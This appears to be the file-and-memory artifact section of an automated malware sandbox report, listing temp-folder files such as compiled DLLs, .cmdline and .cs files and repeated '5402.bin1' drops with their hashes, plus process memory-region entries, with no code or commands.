C:\Users\Admin\AppData\Local\Temp\RES5043.tmp

MD5 4a122eee466af995b7a1d8924beffb42
SHA1 b10f5efaa7f55d317a8614fdee1c57fde080805c
SHA256 b9f61a5ff377549992dac2f1b55ff75626b8661ac0e16b9324ab020baffef3b7
SHA512 df0542d6cefa9ad1a23aef27c6738249fc0390dd8ae8ccca71d62b660ba4693130535774647606f32cef1c131c7b95a41f056addff6cac6a1e9f553f60ae4aa9

C:\Users\Admin\AppData\Local\Temp\uxx4ugcp\uxx4ugcp.dll

MD5 75aa4748f3e6e6d709b8b1bbce3e58d6
SHA1 b1a9cb016fd7dcbabb8426cd58fa383b3498c254
SHA256 a5fd7722a679294932263c268a88db7008c6df49dd6a4f1677c358be6f268deb
SHA512 23300e7f347a6c94b7a6f5103e0d46b1498e4a478b9be3537108e5b88dea48471fc5193584d3b28f2dcc025cbda6d0627ffd5bf60135d232ab4b545c2aa9da99

memory/3756-150-0x0000000000000000-mapping.dmp

\??\c:\Users\Admin\AppData\Local\Temp\iolzmld3\iolzmld3.cmdline

MD5 2398ccec5a25485d6042481ef7559a3a
SHA1 71e68ee684d643f355e65433ad2acf2f6f242863
SHA256 3af15a6c0999fe9ba0bc6ddd67dee3bc0c1003a0b71c3eb94c6c2d1ac8db90fd
SHA512 ab5e61cdfef3e622e35fa6bb4ef07bcb437471f692749649a817cbd9f4b3aa89402f629c86b160544febef3f8226b46ede35d571d152c0ef390cef504b0a30ba

\??\c:\Users\Admin\AppData\Local\Temp\iolzmld3\iolzmld3.0.cs

MD5 aca9704199c51fde14b8bf8165bc2a4c
SHA1 789b408ccad29240bd093515cbd19a199ad2c1c8
SHA256 cb3da8a9768252634f8ed4c62e026dc8217b055e00f11b6012a52ed130c92c27
SHA512 a8c1df598581f508ecbf1e516744f11abfb71ec6bb9895d0b61f15e70e56e27cb40b4e5395b9411b787f8bb4f264ca704d815260677909dc1e599d601d0b5de6

memory/2496-153-0x0000000000000000-mapping.dmp

\??\c:\Users\Admin\AppData\Local\Temp\iolzmld3\CSCACAD3E6DBCBF48B79E53F981574095C0.TMP

MD5 f8fbea95306639b9adfe5d4913a163fc
SHA1 25cdc0c5839ca541de0f2024635d88d201143424
SHA256 6817c040bcad74ce38c95cf8804e7fcb0083575c6db2825783e1c04fa9b1e91c
SHA512 51a31f52d1a368a40dfd06d528a3f55215439b2eec9dc2bf28d6ec0aee51cd3d02f6b8af82a83a0713aabf3e2a687517354fd4f5eda90d0ba9b1c8d0725f05fc

C:\Users\Admin\AppData\Local\Temp\RES513D.tmp

MD5 ca6364963d0e10b3f9430f798562d089
SHA1 8096e5a8e3c65cf7c178204ea92f3d66ac16babd
SHA256 0e2177f33b076c4d61909766d71cf6ffa6080c42a25cd5198c86be36976936fe
SHA512 156ef898d22de0c4a90cfc4d48332e7328e53603d52d669c731b7f904acf6f0bbdb19a97a37b1c99c7ad015c27420fc26075cca6e1598e976d07dd7370ca8f4c

C:\Users\Admin\AppData\Local\Temp\iolzmld3\iolzmld3.dll

MD5 7380ea8a6308480b56661d8171a72f38
SHA1 2acc510489147a6cbd8b7b99c983ed016d4319d2
SHA256 a35454500dbfacdb763ae98d06cc202efcfb6b14551c430054ad40949d9a8a99
SHA512 1e35e97de56938fb78035de57aa6b5e6ae1da30f2e3871f59286c48f1d349c072c0e9ff162823f81064f2b6d78a3e0ea5a1fd4832e3c239e416e18086fc5eb76

memory/3176-157-0x00000184EB9A0000-0x00000184EB9DD000-memory.dmp

memory/3176-158-0x00007FFDD1FD0000-0x00007FFDD2A91000-memory.dmp

memory/3176-159-0x00000184EB9A0000-0x00000184EB9DD000-memory.dmp

memory/3412-160-0x0000012777C80000-0x0000012777D23000-memory.dmp

memory/4872-163-0x0000000000000000-mapping.dmp

memory/3720-162-0x000001842F290000-0x000001842F333000-memory.dmp

memory/2308-164-0x00000000092E0000-0x0000000009383000-memory.dmp

memory/4856-161-0x0000000000000000-mapping.dmp

memory/1676-165-0x00000216AE550000-0x00000216AE5F3000-memory.dmp

memory/4600-167-0x0000000000000000-mapping.dmp

memory/3972-166-0x00000290C22E0000-0x00000290C2383000-memory.dmp

memory/2928-168-0x0000000000000000-mapping.dmp

memory/4872-169-0x0000000000126B20-0x0000000000126B24-memory.dmp

memory/4872-170-0x0000000001600000-0x0000000001696000-memory.dmp

memory/2016-171-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\5402.bin1

MD5 f7aea2435aa888b709ca20f816c33bfd
SHA1 38717c9a73b5f8bd399839cbe0aa57518427e758
SHA256 f0c30a157e0a0ea84b114c2b66a66d444a3824c2bfe7829d929b40e6548fa5d5
SHA512 1ea828fc1932c97f5ba5f6ebf05f2816d4d89f003b094f2d0868d54f52b53774437037e2c8837e97b820d5f2e5d5707825b048a9ab2af261af00810f01bd8232

memory/3696-173-0x0000000000000000-mapping.dmp

memory/2308-174-0x000000000B670000-0x000000000B7AB000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\5402.bin1

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

memory/3948-179-0x0000000000000000-mapping.dmp

memory/2308-180-0x0000000008DD0000-0x0000000008F0A000-memory.dmp

memory/1752-184-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\5402.bin1

MD5 45e2f8c6c0f4ca2bf474ff5611613c3c
SHA1 03766264e59200ea00076eb884a0e060597534f6
SHA256 ddb2002b82a3d4caa1e52cd0c3c66d87605a758498638d75e5fc4475c154d8c5
SHA512 23b178e0b9fd15fdd550838e4271c66c730148af47cecb624311dbfa90c4e985bfacfa305f6459f3f1194ea2f998c71880e3bbcb781770a40138c7222295f04f

memory/4668-186-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\5402.bin1

MD5 45e2f8c6c0f4ca2bf474ff5611613c3c
SHA1 03766264e59200ea00076eb884a0e060597534f6
SHA256 ddb2002b82a3d4caa1e52cd0c3c66d87605a758498638d75e5fc4475c154d8c5
SHA512 23b178e0b9fd15fdd550838e4271c66c730148af47cecb624311dbfa90c4e985bfacfa305f6459f3f1194ea2f998c71880e3bbcb781770a40138c7222295f04f

memory/3428-188-0x0000000000000000-mapping.dmp

memory/2308-189-0x00000000092E0000-0x0000000009383000-memory.dmp

memory/1300-190-0x0000000000000000-mapping.dmp

memory/1980-191-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\5402.bin1

MD5 28c5857b9d6bf0183723449cd9440a02
SHA1 77fed5079cf0ccc7b731718c47393b8120d26668
SHA256 2511cc082c53cf52b652903951746353b6ab39ab35ea05a63a3413af22bfe15a
SHA512 902f1ce5fddfeddf083c483f1031f81cb734685e61abecb223290ad278b828d76ea8fca1ef4d4fec19cfa5a4934e0933a283e6c1a1f7f036843d75aec604634c

memory/4288-193-0x0000000000000000-mapping.dmp

memory/4648-194-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\5402.bin1

MD5 91e8d8629059d044757c002fdb30f7f6
SHA1 5d427d6bd6d8d1d3c487f1657838a986f9202919
SHA256 f2992e2a303c30193752f7b4bc9375bbd551c4a6b7ba2c084757b4f377a80611
SHA512 ac5fd198fadccf0c3bc94e3bb572d6aee3fa2451880ca5058891fb909292fc3d152e76e8c7fe43dad6aa9b03ca48b70b7e8e4c1ce6ba3e2bdeb09cc6e65dede3

memory/4220-196-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\5402.bin1

MD5 ed3204561a6ea836f028293bb7f87d0e
SHA1 454c6de92d2598d3136f0e795605af4208ef73b1
SHA256 5e4a5f745f981b32aaa0098512830eeb8ce469c240ef67b72920744e2bc3125e
SHA512 7b2ac1146b184a453913fb2613a7d58cf58572032530d730edc29a463e5109f1976d1d6818ec62cc3590401ec852351f3eef2c01394396e5d4d942492b6471b1

memory/4276-198-0x0000000000000000-mapping.dmp

memory/2416-199-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\5402.bin1

MD5 c7717d124e952b31f3633e08b2abc64f
SHA1 16381f605672bc938bca863c1c61def0e5ebd072
SHA256 b1844a2796b2839fb139f67671dc001927e7796dcfa8718efd670ef213e34e2d
SHA512 236f330551bf4079c677bef136190079d8047c90b8b1bcb7b36f75412288ef0af249cd7eec3c781f08616833a12ac295b76758ba6660fce080cca15acceb23c4

memory/924-201-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\5402.bin1

MD5 19527b811ed093250808107d2e2de1ed
SHA1 58837f3e17828de5e571ac0d41c4de838c84e4ce
SHA256 d611bded828bea92f39edba187f02924082c50b5836b3bbd2ed3cc57d8afe054
SHA512 fa604ebf5bee1ed9e45faf0899cfb135608338df4dd7595483bc4a183719252b47962db5ec04d2450a8d556b0b2a1bcd9c514ce4eba1c7e5b80154e7c5894428

memory/4616-203-0x0000000000000000-mapping.dmp

memory/5080-204-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\5402.bin1

MD5 3f59a671f7f4a34d7dcdc45ce94b4ab9
SHA1 e1e0cf155d645fa9b092e1f6b53a2435f7207130
SHA256 f8d44bbba2c5499ce8b111dfa28336a618cda25d4f37443ff777bb2c3881bee6
SHA512 a42a33385a796c2a131f3a9a1363897154ff7a8d71a22ce7437ae358b75a5149b1e68a369c87f509cc4f95848adfe8405f5cf6f6fff63d4054c0b7e451829884

memory/3600-206-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\5402.bin1

MD5 3f59a671f7f4a34d7dcdc45ce94b4ab9
SHA1 e1e0cf155d645fa9b092e1f6b53a2435f7207130
SHA256 f8d44bbba2c5499ce8b111dfa28336a618cda25d4f37443ff777bb2c3881bee6
SHA512 a42a33385a796c2a131f3a9a1363897154ff7a8d71a22ce7437ae358b75a5149b1e68a369c87f509cc4f95848adfe8405f5cf6f6fff63d4054c0b7e451829884

memory/4344-208-0x0000000000000000-mapping.dmp

memory/2768-209-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\5402.bin1

MD5 abf64e6496c59529fb810077fd3119ef
SHA1 98ff44e960386613f7d58562cb5f3290e98e9df1
SHA256 794f6c19695cf6d98006039a7a380573a669ee73e270efa0a640d6ca7741c649
SHA512 d8c1c9a0fc4aee82316a07c92dbb207150b253b56df4c9ee5a4d664fcd0b720a2a242c6d16c3eb114425058d1742bcc40c0df821e571df39e761c33c6ada7ee7

memory/3012-211-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\5402.bin1

MD5 abf64e6496c59529fb810077fd3119ef
SHA1 98ff44e960386613f7d58562cb5f3290e98e9df1
SHA256 794f6c19695cf6d98006039a7a380573a669ee73e270efa0a640d6ca7741c649
SHA512 d8c1c9a0fc4aee82316a07c92dbb207150b253b56df4c9ee5a4d664fcd0b720a2a242c6d16c3eb114425058d1742bcc40c0df821e571df39e761c33c6ada7ee7

memory/3056-213-0x0000000000000000-mapping.dmp

memory/2292-214-0x0000000000000000-mapping.dmp

memory/3404-215-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\5402.bin1

MD5 071b54b10c201d9a75dc124bd6b60195
SHA1 e6490ad03960eff659c650bca6fe09c278bef4c7
SHA256 e79290c2f7b9c34296a602c45cc68bb680d0a0ae404b3b90ad1f5fe013dc6091
SHA512 bfd3d967b7ea1a17cf7b79f0192232d9511006d58c6113559884e69d438bb68777ff8105307c997d3055ce815e44857b1c3cf74516f016c917d246e174cb2344

memory/4720-217-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\5402.bin1

MD5 071b54b10c201d9a75dc124bd6b60195
SHA1 e6490ad03960eff659c650bca6fe09c278bef4c7
SHA256 e79290c2f7b9c34296a602c45cc68bb680d0a0ae404b3b90ad1f5fe013dc6091
SHA512 bfd3d967b7ea1a17cf7b79f0192232d9511006d58c6113559884e69d438bb68777ff8105307c997d3055ce815e44857b1c3cf74516f016c917d246e174cb2344

memory/1164-219-0x0000000000000000-mapping.dmp

memory/1824-220-0x0000000000000000-mapping.dmp

memory/3128-221-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\5402.bin1

MD5 d9b94eb5a102fdae456204a449e973a7
SHA1 530974261c01770ad7a39d8ac8151792132ac990
SHA256 150a020be080476b8dc73ba9c278041ef0c0371266f47ac2815943cc37917366
SHA512 e8c548830d9b65a375b7774fda580bb06ae5d2ee4c52b2e87325be78f3de0841a7eda3e0041f2ee0c2af5c029baa2d9b749d35e1b6cba47b0f7db9c85212e77e

memory/4204-223-0x0000000000000000-mapping.dmp

memory/2548-224-0x0000000000000000-mapping.dmp

memory/908-225-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\5402.bin1

MD5 cab5b6729b5bb3e8f490f7cb0189e970
SHA1 0dd4bcc3ce80531496ff5ea7fcaa6b721bc56a5a
SHA256 e85d44207c226c0ec93c5850f193106b807f0606b963f0eb5758865629c7e930
SHA512 8b89cc4a673714131b100bfcb86744d5a8ee7d77b87dee2ddc749e3ff75a71bf0cec4174aec390eacef654b717fffd700d9f588ec0f16c98736fd1cc5a68220e

memory/4224-227-0x0000000000000000-mapping.dmp

memory/432-228-0x0000000000000000-mapping.dmp

memory/4912-229-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\5402.bin1

MD5 3ae9d680b324f08cfe4a590ea56725ac
SHA1 4a02075d3c583159dcae5ac69849bf274cbf90a1
SHA256 c6e2595e5f76cbda8e6ebb1c6465779798c792ff906b7c6e6858b8fd3d211724
SHA512 fc65d1d5ec4e0c5d880f8706db407ae4c0dcd4b8c3a6df0310d1dc90722c767fbabfb175d94a8d2a8814b568a7612090701d5a3a091bc5ce6a97cfc5706a39df

memory/3856-231-0x0000000000000000-mapping.dmp

memory/4440-232-0x0000000000000000-mapping.dmp

memory/3996-233-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\5402.bin1

MD5 5ba94a59c8895f622608e8a6484ba516
SHA1 aa6b20c18d068c0e2613eff286a5ce5d35a68915
SHA256 876085d57159e7f54ed2ea6d01167f94daeb5e90aa07fac151e61b9a0b4ef369
SHA512 2a2150b289dc4f6635c13ba9d42842f46292622f673075da6a6aa522223ae55be855dfd1daa354da5202d268e1b5d88c5698c1d4a0b69ad4b9e90db6907be40a

C:\Users\Admin\AppData\Local\Temp\5402.bin

MD5 bb647e73a1544304d7b25bf7fd1cdd01
SHA1 6f731fb75acdd35e52de886577ee99fc66db2aff
SHA256 67498903bfbfa2680b4630741e6ed999639cc2eb253c8b250a07c567b97ec21b
SHA512 00b5abbd1691c9ddfe60902d7df495ba585a85a8272e4f4eaa0e92d1ebf6007afead623cccd238acf1823fd47ab43ec1d7321d389c58e06d08081985f18e4532